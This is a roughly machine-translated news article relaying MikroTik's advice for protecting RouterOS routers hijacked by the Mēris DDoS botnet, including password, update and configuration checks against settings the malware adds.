Η MikroTik, the network equipment manufacturer, gave some tips on how customers can protect routers affected by the huge Mēris DDoS botnet during the summer.
"From what we have seen, these attacks use the same routers that were violated in 2018, when MikroTik RouterOS had a vulnerability, which was quickly fixed", Said a representative of MikroTik to BleepingComputer.
However, the company warned that the vulnerability fix does not necessarily mean that all routers are secure. If someone got the user password in 2018, the update does not help.
Users must change password, to check their firewall to make sure it does not allow remote access to third parties and to check if there are scripts that they have not created themselves.
M botris botnet
Mnetris botnet was responsible for two huge DdoS attacks that took place a while ago.
The first attack mitigated by Cloudflare in August reached 17,2 million requests per second (RPS). The second one exceeded every limit by reaching them RPS 21,8 million, affecting Yandex servers, earlier this month.
According to her researchers Qrator Labs, the Mēris botnet, derived from Mirai malware code, now controls about 250.000 devices, most of which are MikroTik network gateways and routers.
How to protect MikroTik routers?
MikroTik suggests customers to choose strong passwords that they can protect devices from brute-force attacks. In addition, the devices must be up to date so that vulnerabilities used by the Mēris botnet cannot be exploited.
The company advised users to follow these steps to stay safe:
- Inform regularly MikroTik devices (routers etc).
- Do not allow anyone to access your device over the Internet. If you need remote access, only open one secure VPN service.
- Use one strong password. If you already have a strong password, but you think your device is compromised, change it!
- Do not consider your local network reliable. Malicious software may attempt to connect to your MikroTik router if you have a weak password or do not use a password.
- Check it out configuration of RouterOS for unknown settings.
The settings that the Mēris malware can set when re-configuring compromised MikroTik routers include:
- System -> Scheduler rules that run a Fetch script. Remove them.
- IP -> Socks proxy. If you do not use this feature or do not know what it does, you need to turn it off.
- L2TP client named "lvpn" or L2TP client that you do not recognize.
- Input firewall rule that allows access to port 5678.
MikroTik said it tried to contact all RouterOS users to inform them about the security issue, but many of them did not respond and did not control their devices. The company said it was trying to find other solutions.
"As far as we know at the moment, there are no new vulnerabilities in these devices", Said the company.
Source: Bleeping Computer